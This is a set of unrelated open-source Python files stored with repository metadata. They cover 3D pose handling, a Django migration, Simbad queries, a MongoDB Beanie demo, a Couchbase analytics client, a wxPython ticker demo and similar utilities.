@property
def t(self):
"""Return pose translation"""
return self.pose.t
@property
def R(self):
"""Return pose rotation"""
return self.pose.R
@property
def T(self):
"""Return pose transformation"""
return self.pose.T
@property
def Rt(self):
"""Return pose rotation transposed"""
return self.pose.Rt
@property
def Tt(self):
"""Return pose transformation transposed"""
return self.pose.Tt
def translateX(self, m):
"""Translate object in X by m"""
return self.pose.translateX(m)
def translateY(self, m):
"""Translate object in Y by m"""
return self.pose.translateY(m)
def translateZ(self, m):
"""Translate object in Z by m"""
return self.pose.translateZ(m)
def rotateX(self, d):
"""Rotate object in X by d degrees"""
return self.pose.rotateX(d)
def rotateY(self, d):
"""Rotate object in Y by d degrees"""
return self.pose.rotateY(d)
def rotateZ(self, d):
"""Rotate object in Z by d degrees"""
return self.pose.rotateZ(d)
def rotateI(self, d):
"""Rotate object in X by d degrees (from the camera's perspective)"""
return self.pose.rotateI(d)
def rotateJ(self, d):
"""Rotate object in Y by d degrees (from the camera's perspective)"""
return self.pose.rotateJ(d)
def rotateK(self, d):
"""Rotate object in Z by d degrees (from the camera's perspective)"""
return self.pose.rotateK(d)
def setPose(self, pose):
"""Set object pose"""
return self.pose.setPose(pose)
def display(self, *args, align=None, **kwargs):
"""
Display object
Parameters
----------
args : args
Extra draw arguments
align : camviz.Pose
Pose used to align the object
kwargs : kwargs
Extra draw arguments
"""
# Get transformation (aligned or not)
if align is not None:
T = (align @ self.pose).Tt
else:
T = self.Tt
# Draw object
glPushMatrix()
glMultMatrixf(T)
self.draw(*args, **kwargs)
glPopMatrix()
| 24.553571
| 77
| 0.566182
|
4a0e952aa1a65f16885e00e613c8c65ae3d69087
| 828
|
py
|
Python
|
ASLServerDjango/mysite/polls/migrations/0021_news.py
|
Plusers/ASLServerDjango
|
da03aa6ec53e1f72d320e94ecabba1569c5e9a75
|
[
"MIT"
] | 1
|
2019-10-11T20:14:18.000Z
|
2019-10-11T20:14:18.000Z
|
ASLServerDjango/mysite/polls/migrations/0021_news.py
|
Plusers/ASLServerDjango
|
da03aa6ec53e1f72d320e94ecabba1569c5e9a75
|
[
"MIT"
] | null | null | null |
ASLServerDjango/mysite/polls/migrations/0021_news.py
|
Plusers/ASLServerDjango
|
da03aa6ec53e1f72d320e94ecabba1569c5e9a75
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.9 on 2019-03-26 20:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('polls', '0020_auto_20190326_2002'),
]
operations = [
migrations.CreateModel(
name='News',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, null=True, verbose_name='Заголовок новости')),
('text_of_news', models.CharField(max_length=200, null=True, verbose_name='Текс новости')),
('data_pub', models.DateField(null=True, verbose_name='Дата публикации новости')),
],
),
]
| 33.12
| 114
| 0.619565
|
4a0e956c96bf4e207e82f09a26612b707aa60355
| 1,573
|
py
|
Python
|
fitshelper/utils.py
|
philrosenfield/fitshelper
|
492e5b533fbe4069efbf0849fa6cf71fee76abcd
|
[
"MIT"
] | null | null | null |
fitshelper/utils.py
|
philrosenfield/fitshelper
|
492e5b533fbe4069efbf0849fa6cf71fee76abcd
|
[
"MIT"
] | null | null | null |
fitshelper/utils.py
|
philrosenfield/fitshelper
|
492e5b533fbe4069efbf0849fa6cf71fee76abcd
|
[
"MIT"
] | null | null | null |
"""Common Utilities"""
def replace_all(text, dic):
"""perfrom text.replace(key, value) for all keys and values in dic"""
for old, new in dic.items():
text = text.replace(old, new)
return text
def center_from_simbad(target):
"""Query Simbad for the coordinates of a target."""
from astroquery.simbad import Simbad
import astropy.units as u
from astropy.coordinates import SkyCoord
def sstr(attr):
"""
Strip the value from a simbad table string
e.g.
>>> str(q['RA'])
>>> ' RA \n "h:m:s" \n------------\n04 52 25.040'
>>> sstr(q['RA'])
>>> '04 52 25.040'
"""
return str(attr).split('\n')[-1]
qry = Simbad.query_object(target)
if qry is None:
print('Error, can not query simbad for {}'.format(target))
return np.nan, np.nan
radec = SkyCoord(ra=sstr(qry['RA']), dec=sstr(qry['DEC']),
unit=(u.hourangle, u.deg))
return radec.ra.value, radec.dec.value
def fixnames(data, namecol='SimbadName', repd=None, strrep='NONAME'):
"""
Mark empty names with strrep instead of nan.
Remove spaces and "Cl" and [] (default, or pass a dictionary replacement)
"""
repd = None or {' ': '', '[': '', ']': '', 'Cl': ''}
for i in range(len(data[namecol])):
try:
float(data.loc[i][namecol])
data[namecol].iloc[i] = 'NONAME'
except:
pass
names = [replace_all(l, repd) for l in data[namecol]]
data[namecol] = names
return data
| 28.6
| 77
| 0.557533
|
4a0e96904a2add41f4e0306c9d32af89a677aea9
| 1,193
|
py
|
Python
|
tests/test_it.py
|
ljocha/anncolvar
|
44daeba1d21b6b7225e8ba6d097245a97f6c8a43
|
[
"MIT"
] | 8
|
2018-07-17T09:50:13.000Z
|
2021-12-25T07:20:00.000Z
|
tests/test_it.py
|
ljocha/anncolvar
|
44daeba1d21b6b7225e8ba6d097245a97f6c8a43
|
[
"MIT"
] | 6
|
2018-11-27T12:44:28.000Z
|
2021-10-10T19:22:59.000Z
|
tests/test_it.py
|
ljocha/anncolvar
|
44daeba1d21b6b7225e8ba6d097245a97f6c8a43
|
[
"MIT"
] | 7
|
2018-11-15T01:08:33.000Z
|
2021-12-10T15:53:19.000Z
|
import pytest
import mdtraj as md
import numpy as np
import keras as krs
import argparse as arg
import datetime as dt
import sys
import os
import anncolvar
def test_it():
myinfilename = os.path.join(os.path.dirname(__file__), 'traj_fit.xtc')
myintopname = os.path.join(os.path.dirname(__file__), 'reference.pdb')
mycolvarname = os.path.join(os.path.dirname(__file__), 'results_isomap')
ae, cor = anncolvar.anncollectivevariable(infilename=myinfilename,
intopname=myintopname,
colvarname=mycolvarname,
column=2, boxx=1.0, boxy=1.0, boxz=1.0,
atestset=0.1, shuffle=1, nofit=0, layers=3, layer1=16, layer2=8, layer3=4,
actfun1='sigmoid', actfun2='sigmoid', actfun3='sigmoid',
optim='adam', loss='mean_squared_error', epochs=1000, batch=256,
ofilename='', modelfile='', plumedfile='', plumedfile2='')
assert(cor > 0.99)
if __name__ == '__main__':
pytest.main([__file__])
| 38.483871
| 118
| 0.551551
|
4a0e96fb4395cc528d2c790b1d05dfd13086d041
| 561
|
py
|
Python
|
bin/sam2pairs.py
|
PavriLab/hicer-nf
|
ec726f48511aaa4797743103fa24b4db5a7aeefa
|
[
"MIT"
] | null | null | null |
bin/sam2pairs.py
|
PavriLab/hicer-nf
|
ec726f48511aaa4797743103fa24b4db5a7aeefa
|
[
"MIT"
] | 2
|
2021-01-14T13:01:17.000Z
|
2021-09-27T13:43:58.000Z
|
bin/sam2pairs.py
|
PavriLab/hicer-nf
|
ec726f48511aaa4797743103fa24b4db5a7aeefa
|
[
"MIT"
] | 1
|
2021-01-20T17:07:22.000Z
|
2021-01-20T17:07:22.000Z
|
#!/usr/bin/env python
import argparse as ap
import pysam as ps
import logging
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.INFO)
parser = ap.ArgumentParser()
parser.add_argument('pairedSam',
help = 'paired SAM file')
args = parser.parse_args()
with ps.AlignmentFile(args.pairedSam, 'r') as sam:
for read in sam:
print(read.query_name.replace('#', '$'),
read.reference_name,
read.reference_start + 1,
'-' if read.is_reverse else '+',
sep = '\t')
| 28.05
| 75
| 0.607843
|
4a0e97b414fec292cca9421462383c229d53a947
| 5,403
|
py
|
Python
|
antlir/compiler/requires_provides.py
|
facebookincubator/fs_image
|
3515a24bb0e93176a5584bdc8839464fa28390d7
|
[
"MIT"
] | 9
|
2019-12-02T20:17:35.000Z
|
2020-06-13T16:34:25.000Z
|
antlir/compiler/requires_provides.py
|
facebookincubator/fs_image
|
3515a24bb0e93176a5584bdc8839464fa28390d7
|
[
"MIT"
] | 19
|
2019-11-22T23:30:04.000Z
|
2020-07-16T18:05:48.000Z
|
antlir/compiler/requires_provides.py
|
facebookincubator/fs_image
|
3515a24bb0e93176a5584bdc8839464fa28390d7
|
[
"MIT"
] | 4
|
2019-12-04T19:03:28.000Z
|
2020-06-13T16:34:29.000Z
|
#!/usr/bin/env python3
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
'''
Images are composed of a bunch of Items. These are declared by the user
in an order-independent fashion, but they have to be installed in a specific
order. For example, we can only copy a file into a directory after the
directory already exists.
The main jobs of the image compiler are:
- to validate that the specified Items will work well together, and
- to install them in the appropriate order.
To do these jobs, each Item Provides certain filesystem features --
described in this file -- and also Requires certain predicates about
filesystem features -- described in `requires.py`.
Requires and Provides must interact in some way -- either
(1) Provides objects need to know when they satisfy each requirements, or
(2) Requires objects must know all the Provides that satisfy them.
The first arrangement seemed more maintainable, so each Provides object has
to define its relationship with every Requires predicate, thus:
def matches(self, path_to_reqs_provs, predicate):
"""
`path_to_reqs_provs` is the map constructed by `ValidatedReqsProvs`.
This is a breadcrumb for the future -- having the full set of
"provides" objects will let us resolve symlinks.
"""
return True or False
Future: we might want to add permissions constraints, tackle following
symlinks (or not following them), maybe hardlinks, etc. This would
likely best be tackled via predicate composition with And/Or/Not support
with short-circuiting. E.g. FollowsSymlinks(Pred) would expand to:
Or(
And(IsSymlink(Path), Pred(SymlinkTarget(Path))),
And(Not(IsSymlink(Path)), Pred(SymlinkTarget(Path)),
)
'''
import dataclasses
from enum import Enum, auto
from antlir.fs_utils import Path
class RequirementKind(Enum):
PATH = auto()
GROUP = auto()
USER = auto()
@dataclasses.dataclass(frozen=True)
class Requirement:
kind: RequirementKind
def _normalize_path(path: Path) -> Path:
# Normalize paths as image-absolute. This is crucial since we
# will use `path` as a dictionary key.
return Path(b"/" / path.strip_leading_slashes()).normpath()
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `path` is never initialized.
class RequirePath(Requirement):
path: Path
def __init__(self, path: Path) -> None:
super().__init__(kind=RequirementKind.PATH)
object.__setattr__(self, "path", _normalize_path(path))
class RequireDirectory(RequirePath):
pass
class RequireFile(RequirePath):
pass
class _RequireDoNotAccess(RequirePath):
# Only ProvidesDoNotAccess should instantiate this type of RequirePath and
# it is meant to fail compilation if a RequireDirectory or RequireFile is
# requested at this path.
pass
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `target` is never initialized.
class RequireSymlink(RequirePath):
target: Path
def __init__(self, path: Path, target: Path) -> None:
super().__init__(path=path)
object.__setattr__(self, "target", target)
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `name` is never initialized.
class RequireGroup(Requirement):
name: str
def __init__(self, name: str) -> None:
super().__init__(kind=RequirementKind.GROUP)
object.__setattr__(self, "name", name)
@dataclasses.dataclass(frozen=True)
# pyre-fixme[13]: Attribute `name` is never initialized.
class RequireUser(Requirement):
name: str
def __init__(self, name: str) -> None:
super().__init__(kind=RequirementKind.USER)
object.__setattr__(self, "name", name)
@dataclasses.dataclass(frozen=True)
class Provider:
req: Requirement
def provides(self, req: Requirement) -> bool:
return self.req == req
@dataclasses.dataclass(frozen=True)
class ProvidesPath(Provider):
req: RequirePath
def path(self) -> Path:
return self.req.path
def with_new_path(self, new_path: Path) -> "ProvidesPath":
# pyre-fixme[6]: Expected `RequirePath` for 1st param but got `Path`.
return self.__class__(new_path)
class ProvidesDirectory(ProvidesPath):
def __init__(self, path: Path) -> None:
super().__init__(req=RequireDirectory(path=path))
class ProvidesFile(ProvidesPath):
"Does not have to be a regular file, just any leaf in the FS tree"
def __init__(self, path: Path) -> None:
super().__init__(req=RequireFile(path=path))
class ProvidesSymlink(ProvidesPath):
def __init__(self, path: Path, target: Path) -> None:
super().__init__(req=RequireSymlink(path, target))
def with_new_path(self, new_path: Path) -> "ProvidesSymlink":
# pyre-fixme[16]: `RequirePath` has no attribute `target`.
return self.__class__(new_path, self.req.target)
class ProvidesDoNotAccess(ProvidesPath):
def __init__(self, path: Path) -> None:
super().__init__(req=_RequireDoNotAccess(path=path))
class ProvidesGroup(Provider):
def __init__(self, groupname: str) -> None:
super().__init__(req=RequireGroup(groupname))
class ProvidesUser(Provider):
def __init__(self, username: str) -> None:
super().__init__(req=RequireUser(username))
| 30.353933
| 78
| 0.719785
|
4a0e97d47e68a0679bcdf8ee166f3b80139634a3
| 7,361
|
py
|
Python
|
python_examples/examples/databases/readme_beanie_example.py
|
BurnySc2/tools
|
f2b0f4450fb30cff61d390b222f561c26fd2324b
|
[
"MIT"
] | null | null | null |
python_examples/examples/databases/readme_beanie_example.py
|
BurnySc2/tools
|
f2b0f4450fb30cff61d390b222f561c26fd2324b
|
[
"MIT"
] | 10
|
2021-12-22T19:48:26.000Z
|
2022-03-31T13:22:47.000Z
|
python_examples/examples/databases/readme_beanie_example.py
|
BurnySc2/tools
|
f2b0f4450fb30cff61d390b222f561c26fd2324b
|
[
"MIT"
] | null | null | null |
"""
https://github.com/roman-right/beanie/
https://roman-right.github.io/beanie/
MongoDB GUI Interface: Robo 3T
"""
import asyncio
import sys
from typing import ForwardRef, List
import motor
from beanie import Document, init_beanie
from beanie.odm.operators.update.general import Set
from loguru import logger
from pydantic import Field
from pymongo.errors import ServerSelectionTimeoutError
# Queries can be cached https://roman-right.github.io/beanie/tutorial/cache/
class Author(Document):
name: str
birth_year: int
class Publisher(Document):
name: str
founded_year: int
class Book(Document):
name: str
release_year: int
author: Author
publisher: Publisher
# BookInventory is defined later so we have to use ForwardRef
ForwardRefBookInventory = ForwardRef('BookInventory')
class Library(Document):
name: str
address: str
books: List[ForwardRefBookInventory] = Field(default_factory=list) # type: ignore
class BookInventory(Document):
amount: int
book: Book
library: Library
Library.update_forward_refs()
# pylint: disable=R0914
# pylint: disable=R0915
async def test_database_with_beanie():
# Embedded pure-python dict based dictionary
client = motor.motor_asyncio.AsyncIOMotorClient('mongodb://localhost:27017')
# 1) Create tables
try:
await init_beanie(database=client.db_name, document_models=[Author, Publisher, Book, Library, BookInventory])
except ServerSelectionTimeoutError:
logger.error(
"You can run mongodb by running: 'docker run --rm -d -p 27017-27019:27017-27019 --name mongodb mongo:5.0.0'",
)
sys.exit(1)
# Clear for reuse
await Book.find_all().delete()
await Author.find_all().delete()
await Publisher.find_all().delete()
await Library.find_all().delete()
await BookInventory.find_all().delete()
# 2) Fill tables
author_1 = Author(name='J. R. R. Tolkien', birth_year=1892)
author_2 = Author(name='Harper Lee', birth_year=1926)
author_3 = Author(name='George Orwell', birth_year=1903)
await author_1.insert()
# Alternatively:
await author_2.create()
await Author.insert_many([
author_3,
])
publisher_1 = Publisher(name='Aufbau-Verlag', founded_year=1945)
publisher_2 = Publisher(name='Hoffmann und Campe', founded_year=1781)
publisher_3 = Publisher(name='Heyne Verlag', founded_year=1934)
await Publisher.insert_many([
publisher_1,
publisher_2,
publisher_3,
])
book_1 = Book(
name='The Lord of the Rings',
release_year=1954,
author=await Author.find_one(Author.name == author_1.name),
publisher=await Publisher.find_one(Publisher.name == publisher_1.name)
)
book_2 = Book(
name='To kill a Mockingbird',
release_year=1960,
author=await Author.find_one(Author.name == author_2.name),
publisher=await Publisher.find_one(Publisher.name == publisher_1.name)
)
book_3 = Book(
name='Nineteen Eighty-Four',
release_year=1949,
author=await Author.find_one(Author.name == author_3.name),
publisher=await Publisher.find_one(Publisher.name == publisher_3.name)
)
book_4 = Book(
name='This book was not written',
release_year=2100,
author=await Author.find_one(Author.name == author_3.name),
publisher=await Publisher.find_one(Publisher.name == publisher_3.name)
)
await Book.insert_many([
book_1,
book_2,
book_3,
book_4,
])
library_1 = Library(name='New York Public Library', address='224 East 125th Street', books=[])
library_2 = Library(name='California State Library', address='900 N Street', books=[])
await library_1.save()
await library_2.save()
library_inventory_1 = BookInventory(
book=await Book.find_one(Book.name == book_3.name),
library=await Library.find_one(Library.name == library_1.name),
amount=40
)
library_inventory_2 = BookInventory(
book=await Book.find_one(Book.name == book_2.name),
library=await Library.find_one(Library.name == library_1.name),
amount=15
)
library_inventory_3 = BookInventory(
book=await Book.find_one(Book.name == book_1.name),
library=await Library.find_one(Library.name == library_2.name),
amount=25
)
library_inventory_4 = BookInventory(
book=await Book.find_one(Book.name == book_2.name),
library=await Library.find_one(Library.name == library_2.name),
amount=30
)
# Add library_inventory, which returns the inserted objects (or ids with insert_many
library_inventory_1 = await library_inventory_1.save()
library_inventory_2 = await library_inventory_2.save()
# Add them to library_1.books
library_1.books = [library_inventory_1, library_inventory_2]
# Save changes
_library_1 = await library_1.save()
library_inventory_3 = await library_inventory_3.save()
library_inventory_4 = await library_inventory_4.save()
library_2.books = [library_inventory_3, library_inventory_4]
_library_2 = await library_2.save()
# 3) Select books
# https://docs.mongoengine.org/guide/querying.html#query-operators
async for book in Book.find(Book.release_year < 1960): # pylint: disable=E1133
logger.info(f'Found books released before 1960: {book}')
# Alternatively with mongodb syntax
# async for book in Book.find({"release_year": {"$lt": 1960}}):
# logger.info(f'Found books released before 1960: {book}')
# 4) Update books
assert await Book.find(Book.release_year < 1960).count() == 2
await Book.find(Book.release_year < 1960).update(Set({Book.release_year: 1970}))
# Alternatively with mongodb syntax
# await Book.find({"release_year": {"$lt": 1960}}).update({"$set": {"release_year": 1970}})
assert await Book.find(Book.release_year < 1960).count() == 0
# 5) Delete books
assert await Book.find(Book.name == 'This book was not written').count() == 1
await Book.find(Book.name == 'This book was not written').delete()
assert await Book.find(Book.name == 'This book was not written').count() == 0
# 6) Get data from other tables
async for book in Book.find_all(): # pylint: disable=E1133
logger.info(f'Book ({book}) has author ({book.author}) and publisher ({book.publisher})')
async for book_inventory in BookInventory.find_all(): # pylint: disable=E1133
logger.info(
f'Library {book_inventory.library} has book inventory ({book_inventory}) of book ({book_inventory.book})'
)
# 7) Join two tables and apply filter
# Find all books that are listed in libraries at least 25 times and where author was born before 1910
async for book_inventory in BookInventory.find( # pylint: disable=E1133
BookInventory.amount <= 25,
BookInventory.book.author.birth_year < 1910,
):
logger.info(
f'Book {book_inventory.book} is listed in {book_inventory.library} {book_inventory.amount} times and the author is {book_inventory.book.author}'
)
# 8) TODO: Migration
# 9) Clear table
await Book.find_all().delete()
if __name__ == '__main__':
asyncio.run(test_database_with_beanie())
| 34.237209
| 156
| 0.685641
|
4a0e981d3f4334808d6e47286af28f91d922800d
| 11,220
|
py
|
Python
|
couchbase_core/analytics.py
|
dfresh613/couchbase-python-client
|
c77af56490ed4c6d364fcf8fc1a374570de0239b
|
[
"Apache-2.0"
] | 1
|
2021-04-22T14:46:06.000Z
|
2021-04-22T14:46:06.000Z
|
couchbase_core/analytics.py
|
dfresh613/couchbase-python-client
|
c77af56490ed4c6d364fcf8fc1a374570de0239b
|
[
"Apache-2.0"
] | 3
|
2021-04-19T14:57:20.000Z
|
2021-05-14T12:29:50.000Z
|
couchbase_core/analytics.py
|
dfresh613/couchbase-python-client
|
c77af56490ed4c6d364fcf8fc1a374570de0239b
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2017, Couchbase, Inc.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from couchbase_core._libcouchbase import FMT_JSON
import couchbase_core.n1ql as N
import couchbase_core._libcouchbase as LCB
import time
from couchbase.exceptions import CouchbaseInternalException
try:
import urlparse
except:
import urllib.parse as urlparse
from typing import *
class AnalyticsQuery(N._N1QLQuery):
def __init__(self, querystr, *args, **kwargs):
"""
Create an Analytics Query object. This may be passed as the
`params` argument to :class:`AnalyticsRequest`.
:param querystr: The query string to execute
:param args: Positional placeholder arguments. These satisfy
the placeholder values for positional placeholders in the
query string, demarcated by ``?``.
:param kwargs: Named placeholder arguments. These satisfy
named placeholders in the query string, such as
``$name``, ``$email`` and so on. For the placeholder
values, omit the leading dollar sign (``$``).
Use positional parameters::
q = AnalyticsQuery("SELECT VALUE bw FROM breweries "
"bw WHERE bw.name = ?", 'Kona Brewing')
for row in cb.analytics_query(q, "127.0.0.1"):
print('Got {}'.format(str(row))
Use named parameters::
q = AnalyticsQuery("SELECT VALUE bw FROM breweries "
"bw WHERE bw.name = $brewery", brewery='Kona Brewing')
for row in cb.analytics_query(q, "127.0.0.1"):
print('Got {}'.format(str(row))
When using placeholders, ensure that the placeholder value is
the *unserialized* (i.e. native) Python value, not the JSON
serialized value. For example the query
``SELECT VALUE bw FROM breweries bw WHERE bw.name IN
['Kona Brewing','21st Amendment Brewery Cafe']``
can be rewritten using placeholders:
Correct::
AnalyticsQuery('SELECT VALUE bw FROM breweries bw WHERE bw.name IN ?',
['Kona Brewing', '21st Amendment Brewery Cafe'])
Incorrect::
AnalyticsQuery('SELECT VALUE bw FROM breweries bw WHERE bw.name IN ?',
"[\\"Kona Brewing\\",\\"21st Amendment Brewery Cafe\\"]")
Since the placeholders are serialized to JSON internally anyway.
"""
querystr = querystr.rstrip()
if not querystr.endswith(';'):
querystr += ';'
super(AnalyticsQuery, self).__init__(querystr,*args,**kwargs)
def update(self, *args, **kwargs):
if args:
if 'args' in self._body:
raise couchbase.exceptions.InvalidArgumentException(
"Cannot append positional args to existing query positional args")
else:
self._add_pos_args(args)
if kwargs:
overlapping_keys = set(kwargs.keys()) & set(self._body.keys())
if overlapping_keys:
raise couchbase.exceptions.InvalidArgumentException("Cannot overwrite named args in query")
else:
self._set_named_args(**kwargs)
def gen_iter(self, parent, itercls=None, **kwargs):
return (itercls or AnalyticsRequest)(self, parent, **kwargs)
class DeferredAnalyticsQuery(AnalyticsQuery):
def __init__(self, querystr, *args, **kwargs):
"""
Create a Deferred Analytics Query object. This may be passed as the
`params` argument to :class:`DeferredAnalyticsRequest`. Parameters
are the same as an AnalyticsQuery.
Please note this is a volatile API, which is subject to change in future.
:param querystr: The query string to execute
:param args: Positional placeholder arguments. These satisfy
the placeholder values for positional placeholders in the
query string, demarcated by ``?``.
:param kwargs: Named placeholder arguments. These satisfy
named placeholders in the query string, such as
``$name``, ``$email`` and so on. For the placeholder
values, omit the leading dollar sign (``$``).
"""
super(DeferredAnalyticsQuery, self).__init__(querystr, *args, **kwargs)
self.set_option("mode", "async")
self._timeout = None
@property
def timeout(self):
return self._timeout
@timeout.setter
def timeout(self, value):
self._timeout = value
def gen_iter(self, parent, itercls=None, **kwargs):
return (itercls or DeferredAnalyticsRequest)(self, parent, **kwargs)
class AnalyticsRequest(N.N1QLRequest):
def __init__(self, params, parent):
"""
Object representing the execution of the request on the
server.
.. warning::
You should typically not call this constructor by
yourself, rather use the :meth:`~.Bucket.analytics_query`
method (or one of its async derivatives).
:param params: An :class:`AnalyticsQuery` object.
:param parent: The parent :class:`~.couchbase_core.client.Client` object
To actually receive results of the query, iterate over this
object.
"""
super(AnalyticsRequest, self).__init__(params, parent)
def _submit_query(self):
return self._parent._cbas_query(self._params.encoded)
class DeferredAnalyticsRequest(AnalyticsRequest):
def __init__(self, # type: DeferredAnalyticsRequest
params, # type: DeferredAnalyticsQuery
parent, # type: couchbase_core.client.Client
timeout = None, # type: float
interval = None # type: float
):
# type: (...) -> None
"""
Object representing the execution of a deferred request on the
server.
Please note this is a volatile API, which is subject to change in future.
.. warning::
You should typically not call this constructor by
yourself, rather use the :meth:`~.Bucket.analytics_query`
method (or one of its async derivatives).
:param params: An :class:`DeferredAnalyticsQuery` object.
:param parent: The parent :class:`~.couchbase_core.client.Client` object.
:param timeout: Timeout in seconds.
:param interval: Interval in seconds for deferred polling.
To actually receive results of the query, iterate over this
object.
"""
handle_req = AnalyticsRequest(params, parent)
handle = handle_req.meta.get('handle')
if not handle:
raise CouchbaseInternalException("Endpoint does not support deferred queries")
self.parent = parent
self._final_response = None
self.finish_time = time.time() + (timeout if timeout else params._timeout)
self.handle_host=urlparse.urlparse(handle)
self.interval = interval or 10
super(DeferredAnalyticsRequest,self).__init__(params,parent)
def _submit_query(self):
return {None:self.final_response()}
def _is_ready(self):
"""
Return True if and only if final result has been received, optionally blocking
until this is the case, or the timeout is exceeded.
This is a synchronous implementation but an async one can
be added by subclassing this.
:return: True if ready, False if not
"""
while not self.finish_time or time.time() < self.finish_time:
result=self._poll_deferred()
if result=='success':
return True
if result=='failed':
raise couchbase.exceptions.InternalException("Failed exception")
time.sleep(self.interval)
raise couchbase.exceptions.TimeoutException("Deferred query timed out")
class MRESWrapper:
def __init__(self, response):
self.response=response
if response.value:
self.iter=iter(response.value if isinstance(response.value,list) else [response.value])
else:
self.iter=iter([])
def __getattr__(self, item):
return getattr(self.response,item)
@property
def done(self):
return not len(self.fetch(None))
def fetch(self, mres):
result = next(self.iter,None)
return [result] if result else []
def _poll_deferred(self):
status = "pending"
response_value = {}
try:
response = self.parent._http_request(type=LCB.LCB_HTTP_TYPE_ANALYTICS, method=LCB.LCB_HTTP_METHOD_GET,
path=self.handle_host.path, response_format=FMT_JSON,
host=self._to_host_URI(self.handle_host))
response_value = response.value
status = response_value.get('status')
except Exception as e:
pass
if status == 'failed':
raise couchbase.exceptions.InternalException("Deferred Query Failed")
if status == 'success':
response_handle = response_value.get('handle')
if not response_handle:
raise couchbase.exceptions.InternalException("Got success but no handle from deferred query response")
try:
parsed_response_handle = urlparse.urlparse(response_handle)
except Exception as e:
raise couchbase.exceptions.InternalException("Got invalid url: {}".format(e))
final_response = self.parent._http_request(type=LCB.LCB_HTTP_TYPE_ANALYTICS,
method=LCB.LCB_HTTP_METHOD_GET,
path=parsed_response_handle.path,
host=self._to_host_URI(parsed_response_handle),
response_format=FMT_JSON)
self._final_response = DeferredAnalyticsRequest.MRESWrapper(final_response)
return status
@staticmethod
def _to_host_URI(parsed_response_handle):
host_URI = "{}://{}:{}".format(parsed_response_handle.scheme, parsed_response_handle.hostname,
parsed_response_handle.port)
return host_URI
def final_response(self, default=None):
if self._final_response or self._is_ready():
return self._final_response
return default
@property
def raw(self):
return self.final_response()
| 38.689655
| 118
| 0.61934
|
4a0e9833c0214f86eddba984c7f219d3e67cddeb
| 5,169
|
py
|
Python
|
widgets/Ticker.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 3
|
2018-03-19T07:57:10.000Z
|
2021-07-05T08:55:14.000Z
|
widgets/Ticker.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 6
|
2020-03-24T15:40:18.000Z
|
2021-12-13T19:46:09.000Z
|
widgets/Ticker.py
|
iubica/wx-portfolio
|
12101986db72bcaffd9b744d514d6f9f651ad5a1
|
[
"MIT"
] | 4
|
2018-03-29T21:59:55.000Z
|
2019-12-16T14:56:38.000Z
|
#!/usr/bin/env python
import wx
from wx.lib.ticker import Ticker
import wx.lib.colourselect as csel #for easy color selection
#----------------------------------------------------------------------
class TestPanel(wx.Panel):
def __init__(self, parent, log):
self.log = log
wx.Panel.__init__(self, parent, -1)
self.ticker = Ticker(self)
# Controls for ...controlling... the ticker.
self.txt = wx.TextCtrl(self, value="I am a scrolling ticker!!!!", size=(200,-1))
wx.CallAfter(self.txt.SetInsertionPoint, 0)
txtl = wx.StaticText(self, label="Ticker text:")
fgb = csel.ColourSelect(self, -1, colour=self.ticker.GetForegroundColour())
fgl = wx.StaticText(self, label="Foreground Color:")
bgb = csel.ColourSelect(self, -1, colour=self.ticker.GetBackgroundColour())
bgl = wx.StaticText(self, label="Background Color:")
fontb = wx.Button(self, label="Change")
self.fontl = wx.StaticText(self)
dirb = wx.Button(self, label="Switch")
self.dirl = wx.StaticText(self)
fpsl = wx.StaticText(self, label="Frames per Second:")
fps = wx.Slider(self, value=self.ticker.GetFPS(), minValue=1, maxValue=100,
size=(150,-1),
style=wx.SL_HORIZONTAL|wx.SL_AUTOTICKS|wx.SL_LABELS)
fps.SetTickFreq(5)
ppfl = wx.StaticText(self, label="Pixels per frame:")
ppf = wx.Slider(self, value=self.ticker.GetPPF(), minValue=1, maxValue=10,
size=(150,-1),
style=wx.SL_HORIZONTAL|wx.SL_AUTOTICKS|wx.SL_LABELS)
# Do layout
sz = wx.FlexGridSizer(cols=2, hgap=4, vgap=4)
sz.Add(txtl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.txt, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(fgl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(fgb, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(bgl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(bgb, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.fontl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(fontb, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(self.dirl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(dirb, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(fpsl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(fps, flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
sz.Add(ppfl, flag=wx.ALIGN_CENTER_VERTICAL)
sz.Add(ppf, flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_LEFT)
sz2 = wx.BoxSizer(wx.VERTICAL)
sz2.Add(self.ticker, flag=wx.EXPAND|wx.ALL, border=5)
sz2.Add(sz, flag=wx.EXPAND|wx.ALL, proportion=1, border=25)
self.SetSizer(sz2)
sz2.SetSizeHints(self)
# Bind events
